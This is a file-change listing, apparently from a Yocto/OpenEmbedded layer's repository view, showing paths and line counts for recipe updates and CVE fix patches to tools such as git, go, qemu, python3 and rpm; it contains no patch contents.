-rw-r--r--meta/recipes-devtools/gcc/libgfortran_9.5.bb (renamed from meta/recipes-devtools/gcc/libgfortran_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gdb/gdb-9.1.inc1
-rw-r--r--meta/recipes-devtools/gdb/gdb-common.inc1
-rw-r--r--meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch75
-rw-r--r--meta/recipes-devtools/git/files/CVE-2021-40330.patch108
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-23521.patch367
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-01.patch39
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-02.patch187
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-03.patch146
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-04.patch150
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-05.patch98
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-06.patch90
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-07.patch123
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-08.patch67
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-09.patch162
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-10.patch99
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-11.patch90
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-12.patch124
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-1.patch179
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-2.patch122
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-3.patch154
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-23946.patch184
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-25652.patch94
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-29007.patch159
-rw-r--r--meta/recipes-devtools/git/git.inc35
-rw-r--r--meta/recipes-devtools/git/git/fixsort.patch36
-rw-r--r--meta/recipes-devtools/git/git_2.24.4.bb (renamed from meta/recipes-devtools/git/git_2.24.3.bb)4
-rw-r--r--meta/recipes-devtools/glide/glide_0.13.3.bb5
-rw-r--r--meta/recipes-devtools/gnu-config/gnu-config_git.bb3
-rw-r--r--meta/recipes-devtools/go/go-1.14.inc110
-rw-r--r--meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch74
-rw-r--r--meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch48
-rw-r--r--meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch36
-rw-r--r--meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch82
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch65
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch191
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch38
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch373
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch124
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch152
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch113
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch51
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch101
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch97
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch79
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch86
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch93
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch83
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch357
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch50
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch142
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch198
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch68
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch104
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch36
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch111
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch164
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch47
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch116
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch71
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch131
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch120
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch49
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch113
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch75
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch53
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch104
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch156
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch85
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch97
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch98
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch660
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch200
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch134
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch184
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch349
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch76
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch125
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch635
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch393
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch497
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch585
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch371
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch60
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch90
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch94
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch201
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch84
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch112
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch38
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch212
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch114
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch175
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch262
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch230
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch181
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch393
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch401
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch86
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch1697
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch121
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch205
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch197
-rw-r--r--meta/recipes-devtools/go/go-crosssdk.inc2
-rw-r--r--meta/recipes-devtools/go/go-dep_0.5.4.bb2
-rw-r--r--meta/recipes-devtools/go/go_1.14.bb10
-rw-r--r--meta/recipes-devtools/help2man/help2man-native_1.47.11.bb3
-rw-r--r--meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb1
-rw-r--r--meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb1
-rw-r--r--meta/recipes-devtools/intltool/intltool_0.51.0.bb2
-rw-r--r--meta/recipes-devtools/jquery/jquery_3.5.0.bb6
-rw-r--r--meta/recipes-devtools/libcomps/libcomps_0.1.15.bb4
-rw-r--r--meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch58
-rw-r--r--meta/recipes-devtools/libdnf/libdnf_0.28.1.bb5
-rw-r--r--meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb2
-rw-r--r--meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch55
-rw-r--r--meta/recipes-devtools/librepo/librepo_1.11.2.bb5
-rw-r--r--meta/recipes-devtools/libtool/libtool-2.4.6.inc4
-rw-r--r--meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch35
-rw-r--r--meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch35
-rw-r--r--meta/recipes-devtools/libtool/libtool/lto-prefix.patch22
-rw-r--r--meta/recipes-devtools/libtool/libtool_2.4.6.bb2
-rw-r--r--meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch31
-rw-r--r--meta/recipes-devtools/llvm/llvm_git.bb10
-rw-r--r--meta/recipes-devtools/m4/m4-1.4.18.inc1
-rw-r--r--meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch84
-rw-r--r--meta/recipes-devtools/makedevs/makedevs_1.0.1.bb1
-rw-r--r--meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch431
-rw-r--r--meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb1
-rw-r--r--meta/recipes-devtools/mmc/mmc-utils_git.bb1
-rw-r--r--meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch62
-rw-r--r--meta/recipes-devtools/mtd/mtd-utils_git.bb14
-rw-r--r--meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch42
-rw-r--r--meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch104
-rw-r--r--meta/recipes-devtools/nasm/nasm_2.15.05.bb (renamed from meta/recipes-devtools/nasm/nasm_2.15.03.bb)7
-rw-r--r--meta/recipes-devtools/ninja/ninja_1.10.0.bb6
-rw-r--r--meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch50
-rw-r--r--meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch24
-rw-r--r--meta/recipes-devtools/opkg/opkg_0.4.2.bb7
-rw-r--r--meta/recipes-devtools/orc/orc_0.4.31.bb1
-rw-r--r--meta/recipes-devtools/patch/patch/CVE-2019-20633.patch31
-rw-r--r--meta/recipes-devtools/patch/patch_2.7.6.bb1
-rw-r--r--meta/recipes-devtools/patchelf/patchelf_0.10.bb11
-rw-r--r--meta/recipes-devtools/perl/files/CVE-2023-31484.patch27
-rw-r--r--meta/recipes-devtools/perl/files/CVE-2023-47038.patch121
-rw-r--r--meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb1
-rw-r--r--meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb1
-rw-r--r--meta/recipes-devtools/perl/perl_5.30.1.bb12
-rw-r--r--meta/recipes-devtools/pkgconfig/pkgconfig_git.bb2
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-Add-statx.patch106
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch34
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch49
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch31
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch57
-rw-r--r--meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch48
-rwxr-xr-xmeta/recipes-devtools/pseudo/files/build-oldlibc20
-rw-r--r--meta/recipes-devtools/pseudo/files/moreretries.patch19
-rw-r--r--meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch57
-rw-r--r--meta/recipes-devtools/pseudo/files/seccomp.patch137
-rw-r--r--meta/recipes-devtools/pseudo/files/toomanyfiles.patch71
-rw-r--r--meta/recipes-devtools/pseudo/files/xattr_version.patch54
-rw-r--r--meta/recipes-devtools/pseudo/pseudo.inc14
-rw-r--r--meta/recipes-devtools/pseudo/pseudo_git.bb21
-rw-r--r--meta/recipes-devtools/python-numpy/python-numpy.inc2
-rw-r--r--meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch248
-rw-r--r--meta/recipes-devtools/python/python-setuptools.inc2
-rw-r--r--meta/recipes-devtools/python/python3-jinja2_2.11.3.bb (renamed from meta/recipes-devtools/python/python3-jinja2_2.11.2.bb)5
-rw-r--r--meta/recipes-devtools/python/python3-magic_0.4.15.bb7
-rw-r--r--meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch48
-rw-r--r--meta/recipes-devtools/python/python3-pip_20.0.2.bb1
-rw-r--r--meta/recipes-devtools/python/python3-pycairo_1.19.0.bb2
-rw-r--r--meta/recipes-devtools/python/python3-pygobject_3.34.0.bb2
-rw-r--r--meta/recipes-devtools/python/python3-scons_3.1.2.bb1
-rw-r--r--meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch29
-rw-r--r--meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch42
-rw-r--r--meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch33
-rw-r--r--meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch24
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-14422.patch77
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-26116.patch104
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-27619.patch70
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2023-24329.patch80
-rw-r--r--meta/recipes-devtools/python/python3/makerace.patch23
-rw-r--r--meta/recipes-devtools/python/python3/python3-manifest.json4
-rw-r--r--meta/recipes-devtools/python/python3_3.8.18.bb (renamed from meta/recipes-devtools/python/python3_3.8.2.bb)40
-rw-r--r--meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb2
-rw-r--r--meta/recipes-devtools/qemu/qemu.inc163
-rw-r--r--meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch9
-rw-r--r--meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch48
-rw-r--r--meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch63
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch164
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch139
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch100
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch266
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch112
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch86
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch139
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch54
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch91
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch69
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch65
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch69
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch61
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch94
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch46
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch101
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch73
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch48
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch45
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch51
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch45
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch81
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch62
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch74
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch67
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch55
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch92
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch85
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch103
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch71
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch93
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch177
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch40
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch59
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch29
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch46
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch40
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch80
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch67
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch124
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch180
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch81
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch89
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch57
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch103
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch77
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch178
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch114
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch146
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch55
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch236
-rw-r--r--meta/recipes-devtools/qemu/qemu_4.2.0.bb5
-rw-r--r--meta/recipes-devtools/quilt/quilt.inc3
-rw-r--r--meta/recipes-devtools/quilt/quilt/faildiff-order.patch41
-rw-r--r--meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch25
-rw-r--r--meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch34
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-20266.patch109
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3421.patch197
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch60
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch55
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch34
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521.patch330
-rw-r--r--meta/recipes-devtools/rpm/rpm_4.14.2.1.bb12
-rw-r--r--meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch31
-rw-r--r--meta/recipes-devtools/rsync/files/CVE-2022-29154.patch334
-rw-r--r--meta/recipes-devtools/rsync/rsync_3.1.3.bb3
-rw-r--r--meta/recipes-devtools/ruby/ruby.inc4
-rw-r--r--meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch32
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch40
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch139
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch61
-rw-r--r--meta/recipes-devtools/ruby/ruby_2.7.6.bb (renamed from meta/recipes-devtools/ruby/ruby_2.7.1.bb)12
-rwxr-xr-xmeta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts10
-rw-r--r--meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service2
-rw-r--r--meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb1
-rw-r--r--meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch253
-rw-r--r--meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb5
-rwxr-xr-xmeta/recipes-devtools/strace/strace/run-ptest2
-rw-r--r--meta/recipes-devtools/strace/strace_5.5.bb1
-rw-r--r--meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch117
-rw-r--r--meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch146
-rw-r--r--meta/recipes-devtools/subversion/subversion_1.13.0.bb3
-rw-r--r--meta/recipes-devtools/swig/swig/determinism.patch19
-rw-r--r--meta/recipes-devtools/swig/swig_3.0.12.bb1
-rw-r--r--meta/recipes-devtools/syslinux/syslinux/determinism.patch22
-rw-r--r--meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb6
-rw-r--r--meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb8
-rw-r--r--meta/recipes-devtools/tcf-agent/tcf-agent_git.bb3
-rw-r--r--meta/recipes-devtools/tcltk/tcl_8.6.10.bb2
-rw-r--r--meta/recipes-devtools/unfs3/unfs3_git.bb5
-rw-r--r--meta/recipes-devtools/unifdef/unifdef_2.12.bb1
-rw-r--r--meta/recipes-devtools/vala/vala.inc2
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch9
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/remove-for-aarch643
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/remove-for-all4
-rwxr-xr-xmeta/recipes-devtools/valgrind/valgrind/run-ptest10
-rw-r--r--meta/recipes-devtools/valgrind/valgrind_3.15.0.bb5
-rw-r--r--meta/recipes-devtools/xmlto/xmlto_0.0.28.bb5
-rw-r--r--meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch42
-rw-r--r--meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb5
-rw-r--r--meta/recipes-extended/bash/bash.inc6
-rw-r--r--meta/recipes-extended/bash/bash/CVE-2019-18276.patch (renamed from meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch)0
-rw-r--r--meta/recipes-extended/bash/bash_5.0.bb2
-rw-r--r--meta/recipes-extended/bc/bc_1.07.1.bb3
-rw-r--r--meta/recipes-extended/bzip2/bzip2/Makefile.am2
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch58
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch312
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch581
-rw-r--r--meta/recipes-extended/cpio/cpio_2.13.bb6
-rw-r--r--meta/recipes-extended/cracklib/cracklib_2.9.5.bb3
-rw-r--r--meta/recipes-extended/cups/cups.inc21
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2022-26691.patch33
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-32324.patch36
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-32360.patch31
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-34241.patch65
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-4504.patch40
-rw-r--r--meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb3
-rw-r--r--meta/recipes-extended/ed/ed_1.15.bb1
-rw-r--r--meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch28
-rw-r--r--meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch24
-rw-r--r--meta/recipes-extended/gawk/gawk_5.0.1.bb15
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch31
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch109
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch121
